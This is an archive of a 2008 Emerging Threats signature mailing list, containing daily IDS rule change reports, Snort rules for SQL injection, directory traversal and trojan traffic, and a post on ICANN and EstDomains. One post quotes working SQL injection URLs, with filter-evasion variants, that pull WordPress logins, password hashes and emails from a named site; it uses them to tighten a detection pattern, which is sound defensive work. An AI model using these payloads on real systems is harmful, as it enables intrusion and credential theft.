|| ET MALWARE iframebiz - /qwertyuiyw12ertyuytre/adv***.php || url,www.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=TROJ_DLOADR.QC&VSect=T || url,iframecash.biz 2008682 || ET TROJAN Trojan.Zonebac.D 2008683 || ET EXPLOIT Dart Communications PowerTCP FTP for ActiveX DartFtp.dll Control Buffer Overflow || url,www.milw0rm.com/exploits/6793 || bugtraq,31814 2008684 || ET WEB_SPECIFIC E-Shop Shopping Cart Script search_results.php SQL Injection || bugtraq,30692 2008685 || ET WEB_SPECIFIC Joomla DS-Syndicate Component feed_id SQL Injection || url,www.milw0rm.com/exploits/6792 || url,www.secunia.com/advisories/32321 2008686 || ET WEB_SPECIFIC zeeproperty adid Parameter Remote SQL Injection || url,milw0rm.com/exploits/6780 || url,secunia.com/Advisories/32333/ 2008687 || ET WEB PassWiki site_id Parameter Local File Inclusion || bugtraq,29455 2008688 || ET WEB_SPECIFIC XOOPS Makale Module id SQL Injection || url,www.milw0rm.com/exploits/6795 || url,secunia.com/advisories/32347/ 2008689 || ET TROJAN Gimmiv.A.dll Infection || url,www.microsoft.com/security/portal/Entry.aspx?name=TrojanSpy%3aWin32%2fGimmiv.A 2008690 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (1) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008691 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (2) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008692 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (3) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008693 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (4) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008694 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (5) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008695 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (6) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008696 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (7) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008697 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (8) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008698 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (9) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008699 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (10) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008700 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 - Known Exploit Instance || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008701 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (11) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008702 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (12) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008703 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (13) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008704 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (14) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008705 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (15) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008706 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (16) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008707 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (17) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008708 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (18) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008709 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (19) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008710 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (20) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008711 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (21) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008712 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (22) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008713 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (23) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008714 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (24) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008715 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (25) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008716 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (26) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008717 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (27) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008718 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (28) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008719 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (29) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008720 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (30) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008721 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 - Known Exploit Instance (2) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008722 || ET WEB_SPECIFIC Simple Customer contact.php SQL injection || bugtraq,28852 2008723 || ET WEB_SPECIFIC ShopMaker product.php id Parameter Remote SQL Injection || bugtraq,31854 || url,www.milw0rm.com/exploits/6799 2008724 || ET WEB_SPECIFIC Bahar Download Script aspkat.asp SQL Injection || bugtraq,31852 2008725 || ET WEB_SPECIFIC WordPress Newsletter Plugin newsletter Parameter SQL Injection || url,secunia.com/advisories/32336 || url,milw0rm.com/exploits/6777 2008726 || ET TROJAN Gimmiv Infection Ping Outbound 2008727 || ET TROJAN Gimmiv Infection Ping Inbound 2008728 || ET TROJAN General Downloader URL - Post Infection 2400008 || ET DROP Spamhaus DROP Listed Traffic Inbound || url,www.spamhaus.org/drop/drop.lasso 2401008 || ET DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE || url,www.spamhaus.org/drop/drop.lasso 2404020 || ET DROP Known Bot C&C Server Traffic (group 21) || url,www.shadowserver.org 2405020 || ET DROP Known Bot C&C Traffic (group 21) - BLOCKING SOURCE || url,www.shadowserver.org -> Added to emerging-virus.rules (2): #by michael sconzo #ref 483dbf6dd97ec249b0ec84a358e39260 -> Added to emerging-web.rules (1): #by Stillsecure -> Added to emerging-web_sql_injection.rules (1): #by stillsecure [---] Removed non-rule lines: [---] -> Removed from emerging-drop-BLOCK.rules (2): # VERSION 1330 # Generated 2008-10-18 00:03:02 EDT -> Removed from emerging-drop.rules (2): # VERSION 1330 # Generated 2008-10-18 00:03:02 EDT From emerging at emergingthreats.net Sun Oct 26 15:00:08 2008 From: emerging at emergingthreats.net (emerging@emergingthreats.net) Date: Sun, 26 Oct 2008 16:00:08 -0400 (EDT) Subject: [Emerging-Sigs] Emerging Threats Daily Signature Changes Message-ID: <20081026200008.9C9D645026@goliath.jonkmans.com> [***] Results from Oinkmaster started Sun Oct 26 16:00:08 2008 [***] [+++] Added rules: [+++] 2008729 - SCAN Mini MySqlatOr SQL Injection Scanner (emerging-scan.rules) [///] Modified active rules: [///] 2008655 - ET MALWARE Frequently Used Fake trojan downloader User Agent (Windows 5.1 (2600). DMCP ver 2) (emerging-malware.rules) [+++] Added non-rule lines: [+++] -> Added to emerging-sid-msg.map (2): 2008655 || ET MALWARE Frequently Used Fake trojan downloader User Agent (Windows 5.1 (2600). DMCP ver 2) 2008729 || SCAN Mini MySqlatOr SQL Injection Scanner || url,www.scrt.ch/pages_en/minimysqlator.html -> Added to emerging-sid-msg.map.txt (2): 2008655 || ET MALWARE Frequently Used Fake trojan downloader User Agent (Windows 5.1 (2600). DMCP ver 2) 2008729 || SCAN Mini MySqlatOr SQL Injection Scanner || url,www.scrt.ch/pages_en/minimysqlator.html [---] Removed non-rule lines: [---] -> Removed from emerging-sid-msg.map (1): 2008655 || ET MALWARE Frequently Used Fake trojan downloader User Agent -> Removed from emerging-sid-msg.map.txt (1): 2008655 || ET MALWARE Frequently Used Fake trojan downloader User Agent From signatures at stillsecure.com Mon Oct 27 10:02:10 2008 From: signatures at stillsecure.com (signatures) Date: Mon, 27 Oct 2008 09:02:10 -0600 Subject: [Emerging-Sigs] StillSecure: 3 New Signatures - Oct-27-2008 Message-ID: <5C9E8CCEEB81ED498AC0C3B0054704F3054C290F@webmail.latis.com> Hi Matt, Please find 3 New Signatures below: 1. KasraCMS index.php shme parameter SQL Injection alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"KasraCMS index.php shme parameter SQL Injection"; flow:established,to_server; content:"GET "; depth:4; uricontent:"/index.php?shme="; nocase; uricontent:"UNION"; nocase; uricontent:"SELECT"; nocase; pcre:"/UNION\s+SELECT/Ui"; classtype:web-application-attack; reference:bugtraq,31918; reference:url,milw0rm.com/exploits/6837; sid:8529; rev:1;) 2. KasraCMS index.php cont parameter SQL Injection alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"KasraCMS index.php cont parameter SQL Injection"; flow:established,to_server; content:"GET "; depth:4; uricontent:"/index.php?cont="; nocase; uricontent:"UNION"; nocase; uricontent:"SELECT"; nocase; pcre:"/UNION\s+SELECT/Ui"; classtype:web-application-attack; reference:bugtraq,31918; reference:url,milw0rm.com/exploits/6837; sid:8530; rev:1;) 3. Joomla Component Archaic Binary gallery Directory Traversal alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"Joomla Component Archaic Binary gallery Directory Traversal"; flow:established,to_server; content:"GET "; depth:4; uricontent:"/index.php?option=com_ab_gallery"; nocase; uricontent:"gallery="; nocase; pcre:"/(\.\.\/){1,}/"; classtype:web-application-attack; reference:url,secunia.com/advisories/32381/; reference:url,milw0rm.com/exploits/6826; sid:8531; rev:1;) Looking forward for your comments if any... Thanks & Regards, StillSecure -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20081027/7432120f/attachment.html From emerging at emergingthreats.net Mon Oct 27 15:00:08 2008 From: emerging at emergingthreats.net (emerging@emergingthreats.net) Date: Mon, 27 Oct 2008 16:00:08 -0400 (EDT) Subject: [Emerging-Sigs] Emerging Threats Daily Signature Changes Message-ID: <20081027200008.AF6B44502B@goliath.jonkmans.com> [***] Results from Oinkmaster started Mon Oct 27 16:00:08 2008 [***] [+++] Added rules: [+++] 2008730 - ET TROJAN Ipbill.com Related Dialer Trojan Checkin (emerging-virus.rules) 2008731 - ET TROJAN Ipbill.com Related Dialer Trojan Server Response (emerging-virus.rules) [+++] Added non-rule lines: [+++] -> Added to emerging-sid-msg.map (2): 2008730 || ET TROJAN Ipbill.com Related Dialer Trojan Checkin 2008731 || ET TROJAN Ipbill.com Related Dialer Trojan Server Response -> Added to emerging-sid-msg.map.txt (2): 2008730 || ET TROJAN Ipbill.com Related Dialer Trojan Checkin 2008731 || ET TROJAN Ipbill.com Related Dialer Trojan Server Response [---] Removed non-rule lines: [---] -> Removed from emerging-sid-msg.map (2): 2404020 || ET DROP Known Bot C&C Server Traffic (group 21) || url,www.shadowserver.org 2405020 || ET DROP Known Bot C&C Traffic (group 21) - BLOCKING SOURCE || url,www.shadowserver.org -> Removed from emerging-sid-msg.map.txt (2): 2404020 || ET DROP Known Bot C&C Server Traffic (group 21) || url,www.shadowserver.org 2405020 || ET DROP Known Bot C&C Traffic (group 21) - BLOCKING SOURCE || url,www.shadowserver.org From emerging at emergingthreats.net Tue Oct 28 15:00:09 2008 From: emerging at emergingthreats.net (emerging@emergingthreats.net) Date: Tue, 28 Oct 2008 16:00:09 -0400 (EDT) Subject: [Emerging-Sigs] Emerging Threats Daily Signature Changes Message-ID: <20081028200009.186324502D@goliath.jonkmans.com> [***] Results from Oinkmaster started Tue Oct 28 16:00:09 2008 [***] [+++] Added rules: [+++] 2406032 - ET RBN Known Russian Business Network Monitored Domains (33) (emerging-rbn.rules) 2406033 - ET RBN Known Russian Business Network Monitored Domains (34) (emerging-rbn.rules) 2406034 - ET RBN Known Russian Business Network Monitored Domains (35) (emerging-rbn.rules) 2406035 - ET RBN Known Russian Business Network Monitored Domains (36) (emerging-rbn.rules) 2407032 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (33) (emerging-rbn-BLOCK.rules) 2407033 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (34) (emerging-rbn-BLOCK.rules) 2407034 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (35) (emerging-rbn-BLOCK.rules) 2407035 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (36) (emerging-rbn-BLOCK.rules) [///] Modified active rules: [///] 2406000 - ET RBN Known Russian Business Network Monitored Domains (1) (emerging-rbn.rules) 2406001 - ET RBN Known Russian Business Network Monitored Domains (2) (emerging-rbn.rules) 2406002 - ET RBN Known Russian Business Network Monitored Domains (3) (emerging-rbn.rules) 2406003 - ET RBN Known Russian Business Network Monitored Domains (4) (emerging-rbn.rules) 2406004 - ET RBN Known Russian Business Network Monitored Domains (5) (emerging-rbn.rules) 2406005 - ET RBN Known Russian Business Network Monitored Domains (6) (emerging-rbn.rules) 2406006 - ET RBN Known Russian Business Network Monitored Domains (7) (emerging-rbn.rules) 2406007 - ET RBN Known Russian Business Network Monitored Domains (8) (emerging-rbn.rules) 2406008 - ET RBN Known Russian Business Network Monitored Domains (9) (emerging-rbn.rules) 2406009 - ET RBN Known Russian Business Network Monitored Domains (10) (emerging-rbn.rules) 2406010 - ET RBN Known Russian Business Network Monitored Domains (11) (emerging-rbn.rules) 2406011 - ET RBN Known Russian Business Network Monitored Domains (12) (emerging-rbn.rules) 2406012 - ET RBN Known Russian Business Network Monitored Domains (13) (emerging-rbn.rules) 2406013 - ET RBN Known Russian Business Network Monitored Domains (14) (emerging-rbn.rules) 2406014 - ET RBN Known Russian Business Network Monitored Domains (15) (emerging-rbn.rules) 2406015 - ET RBN Known Russian Business Network Monitored Domains (16) (emerging-rbn.rules) 2406016 - ET RBN Known Russian Business Network Monitored Domains (17) (emerging-rbn.rules) 2406017 - ET RBN Known Russian Business Network Monitored Domains (18) (emerging-rbn.rules) 2406018 - ET RBN Known Russian Business Network Monitored Domains (19) (emerging-rbn.rules) 2406019 - ET RBN Known Russian Business Network Monitored Domains (20) (emerging-rbn.rules) 2406020 - ET RBN Known Russian Business Network Monitored Domains (21) (emerging-rbn.rules) 2406021 - ET RBN Known Russian Business Network Monitored Domains (22) (emerging-rbn.rules) 2406022 - ET RBN Known Russian Business Network Monitored Domains (23) (emerging-rbn.rules) 2406023 - ET RBN Known Russian Business Network Monitored Domains (24) (emerging-rbn.rules) 2406024 - ET RBN Known Russian Business Network Monitored Domains (25) (emerging-rbn.rules) 2406025 - ET RBN Known Russian Business Network Monitored Domains (26) (emerging-rbn.rules) 2406026 - ET RBN Known Russian Business Network Monitored Domains (27) (emerging-rbn.rules) 2406027 - ET RBN Known Russian Business Network Monitored Domains (28) (emerging-rbn.rules) 2406028 - ET RBN Known Russian Business Network Monitored Domains (29) (emerging-rbn.rules) 2406029 - ET RBN Known Russian Business Network Monitored Domains (30) (emerging-rbn.rules) 2406030 - ET RBN Known Russian Business Network Monitored Domains (31) (emerging-rbn.rules) 2406031 - ET RBN Known Russian Business Network Monitored Domains (32) (emerging-rbn.rules) 2407000 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (1) (emerging-rbn-BLOCK.rules) 2407001 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (2) (emerging-rbn-BLOCK.rules) 2407002 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (3) (emerging-rbn-BLOCK.rules) 2407003 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (4) (emerging-rbn-BLOCK.rules) 2407004 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (5) (emerging-rbn-BLOCK.rules) 2407005 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (6) (emerging-rbn-BLOCK.rules) 2407006 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (7) (emerging-rbn-BLOCK.rules) 2407007 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (8) (emerging-rbn-BLOCK.rules) 2407008 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (9) (emerging-rbn-BLOCK.rules) 2407009 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (10) (emerging-rbn-BLOCK.rules) 2407010 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (11) (emerging-rbn-BLOCK.rules) 2407011 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (12) (emerging-rbn-BLOCK.rules) 2407012 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (13) (emerging-rbn-BLOCK.rules) 2407013 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (14) (emerging-rbn-BLOCK.rules) 2407014 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (15) (emerging-rbn-BLOCK.rules) 2407015 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (16) (emerging-rbn-BLOCK.rules) 2407016 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (17) (emerging-rbn-BLOCK.rules) 2407017 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (18) (emerging-rbn-BLOCK.rules) 2407018 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (19) (emerging-rbn-BLOCK.rules) 2407019 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (20) (emerging-rbn-BLOCK.rules) 2407020 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (21) (emerging-rbn-BLOCK.rules) 2407021 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (22) (emerging-rbn-BLOCK.rules) 2407022 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (23) (emerging-rbn-BLOCK.rules) 2407023 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (24) (emerging-rbn-BLOCK.rules) 2407024 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (25) (emerging-rbn-BLOCK.rules) 2407025 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (26) (emerging-rbn-BLOCK.rules) 2407026 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (27) (emerging-rbn-BLOCK.rules) 2407027 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (28) (emerging-rbn-BLOCK.rules) 2407028 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (29) (emerging-rbn-BLOCK.rules) 2407029 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (30) (emerging-rbn-BLOCK.rules) 2407030 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (31) (emerging-rbn-BLOCK.rules) 2407031 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (32) (emerging-rbn-BLOCK.rules) [+++] Added non-rule lines: [+++] -> Added to emerging-rbn-BLOCK.rules (2): # VERSION 81 # Updated 2008-10-27 09:14:06 -> Added to emerging-rbn.rules (2): # VERSION 81 # Updated 2008-10-27 09:14:06 -> Added to emerging-sid-msg.map (10): 2404020 || ET DROP Known Bot C&C Server Traffic (group 21) || url,www.shadowserver.org 2405020 || ET DROP Known Bot C&C Traffic (group 21) - BLOCKING SOURCE || url,www.shadowserver.org 2406032 || ET RBN Known Russian Business Network Monitored Domains (33) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2406033 || ET RBN Known Russian Business Network Monitored Domains (34) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2406034 || ET RBN Known Russian Business Network Monitored Domains (35) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2406035 || ET RBN Known Russian Business Network Monitored Domains (36) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407032 || ET RBN Known Russian Business Network Monitored Domains - BLOCKING (33) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407033 || ET RBN Known Russian Business Network Monitored Domains - BLOCKING (34) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407034 || ET RBN Known Russian Business Network Monitored Domains - BLOCKING (35) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407035 || ET RBN Known Russian Business Network Monitored Domains - BLOCKING (36) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork -> Added to emerging-sid-msg.map.txt (10): 2404020 || ET DROP Known Bot C&C Server Traffic (group 21) || url,www.shadowserver.org 2405020 || ET DROP Known Bot C&C Traffic (group 21) - BLOCKING SOURCE || url,www.shadowserver.org 2406032 || ET RBN Known Russian Business Network Monitored Domains (33) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2406033 || ET RBN Known Russian Business Network Monitored Domains (34) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2406034 || ET RBN Known Russian Business Network Monitored Domains (35) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2406035 || ET RBN Known Russian Business Network Monitored Domains (36) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407032 || ET RBN Known Russian Business Network Monitored Domains - BLOCKING (33) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407033 || ET RBN Known Russian Business Network Monitored Domains - BLOCKING (34) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407034 || ET RBN Known Russian Business Network Monitored Domains - BLOCKING (35) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407035 || ET RBN Known Russian Business Network Monitored Domains - BLOCKING (36) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork [---] Removed non-rule lines: [---] -> Removed from emerging-rbn-BLOCK.rules (2): # VERSION 80 # Updated 2008-10-08 09:28:13 -> Removed from emerging-rbn.rules (2): # VERSION 80 # Updated 2008-10-08 09:28:13 From jonkman at jonkmans.com Wed Oct 29 09:34:46 2008 From: jonkman at jonkmans.com (Matt Jonkman) Date: Wed, 29 Oct 2008 10:34:46 -0400 Subject: [Emerging-Sigs] ICANN Terminates EstDomains Message-ID: <49087486.8080209@jonkmans.com> As many of you know, EstDomains is/was one of the havens for malware and crime syndicates to register domain names. They used EstDomains because they could falsify their contact information making it difficult for law enforcement to find them, and because EstDomains rarely if ever responded to abuse complaints to suspend domains. Well, ICANN has terminated EstDomains' registrar agreement for failure to provide and verify contact information of their registrants. THANK YOU ICANN!! This is a long time coming, but the wheels of bureaucracy move slowly. Lets applaud ICANN for making this move, and lets encourage them to be looking at the 30 other bad players in the registrations market that make most of the crime possible. Bizcn.com, Joker.com, etc. More information is available here: http://www.icann.org/en/compliance/ Well Done ICANN! Please keep after the rest of them, this will have an incredible impact if you keep going! Matt -- -------------------------------------------- Matthew Jonkman Emerging Threats Phone 765-429-0398 Fax 312-264-0205 http://www.emergingthreats.net -------------------------------------------- PGP: http://www.jonkmans.com/mattjonkman.asc From wolvee_x at yahoo.com Wed Oct 29 10:08:38 2008 From: wolvee_x at yahoo.com (Mahesh Yelsani) Date: Wed, 29 Oct 2008 08:08:38 -0700 (PDT) Subject: [Emerging-Sigs] pcre in WEB_SPECIFIC rules Message-ID: <75253.44173.qm@web59616.mail.ac4.yahoo.com> Hi, I Observed that in WEB_SPECIFIC rules pcre is changed to UNION.+SELECT to UNION\s+SELECT, when we use UNION\s+SELECT it will catch only when there is space between UNION and SELECT but it will not catch all. for Ex: alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"ET WEB_SPECIFIC WordPress Newsletter Plugin newsletter Parameter SQL Injection"; flow:to_server,established; content:"GET "; depth:4; uricontent:"/st_newsletter/stnl_iframe.php"; nocase; uricontent:"?newsletter="; nocase; uricontent:"UNION"; nocase; uricontent:"SELECT"; nocase; pcre:"/UNION\s+SELECT/Ui"; classtype:web-application-attack; reference:url,milw0rm.com/exploits/6777; reference:url,secunia.com/advisories/32336; sid:2008725; rev:1;) The above Rule catch the following http://flymusic.co.uk/wp-content/plugins/st_newsletter/stnl_iframe.php?newsletter=-9999 UNION SELECT concat(user_login,0x3a,user_pass,0x3a,user_email)+FROM+wp_users-- http://flymusic.co.uk/wp-content/plugins/st_newsletter/stnl_iframe.php?newsletter=-9999%20UNION%20SELECT%20concat(user_login,0x3a,user_pass,0x3a,user_email)+FROM+wp_users-- But it will not catching the following exploits which produce same results http://flymusic.co.uk/wp-content/plugins/st_newsletter/stnl_iframe.php?newsletter=-9999+UNION+SELECT+concat(user_login,0x3a,user_pass,0x3a,user_email)+FROM+wp_users-- http://flymusic.co.uk/wp-content/plugins/st_newsletter/stnl_iframe.php?newsletter=-9999/**/UNION/**/SELECT/**/concat(user_login,0x3a,user_pass,0x3a,user_email)+FROM+wp_users-- http://flymusic.co.uk/wp-content/plugins/st_newsletter/stnl_iframe.php?newsletter=-9999+UNION+all+SELECT+concat(user_login,0x3a,user_pass,0x3a,user_email)+FROM+wp_users-- http://flymusic.co.uk/wp-content/plugins/st_newsletter/stnl_iframe.php?newsletter=-9999%20UNION%20all%20SELECT%20concat(user_login,0x3a,user_pass,0x3a,user_email)+FROM+wp_users-- If we use .+ it will catch all of them, is there any specific reason for using \s+ Thanks, Wolvee. -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20081029/ba7d0625/attachment.html From emerging at emergingthreats.net Wed Oct 29 15:00:08 2008 From: emerging at emergingthreats.net (emerging@emergingthreats.net) Date: Wed, 29 Oct 2008 16:00:08 -0400 (EDT) Subject: [Emerging-Sigs] Emerging Threats Daily Signature Changes Message-ID: <20081029200008.B3A9B4502B@goliath.jonkmans.com> [***] Results from Oinkmaster started Wed Oct 29 16:00:08 2008 [***] [+++] Added rules: [+++] 2008732 - ET TROJAN FraudTool.Win32.SysCleaner.a (emerging-virus.rules) 2008733 - ET TROJAN Trojan.Win32.Regrun.ro FTP connection detected (emerging-virus.rules) [+++] Added non-rule lines: [+++] -> Added to emerging-sid-msg.map (2): 2008732 || ET TROJAN FraudTool.Win32.SysCleaner.a 2008733 || ET TROJAN Trojan.Win32.Regrun.ro FTP connection detected -> Added to emerging-sid-msg.map.txt (2): 2008732 || ET TROJAN FraudTool.Win32.SysCleaner.a 2008733 || ET TROJAN Trojan.Win32.Regrun.ro FTP connection detected -> Added to emerging-virus.rules (2): #ref: c89eec06daf6ceb4ee1cdcd485db9916 #re 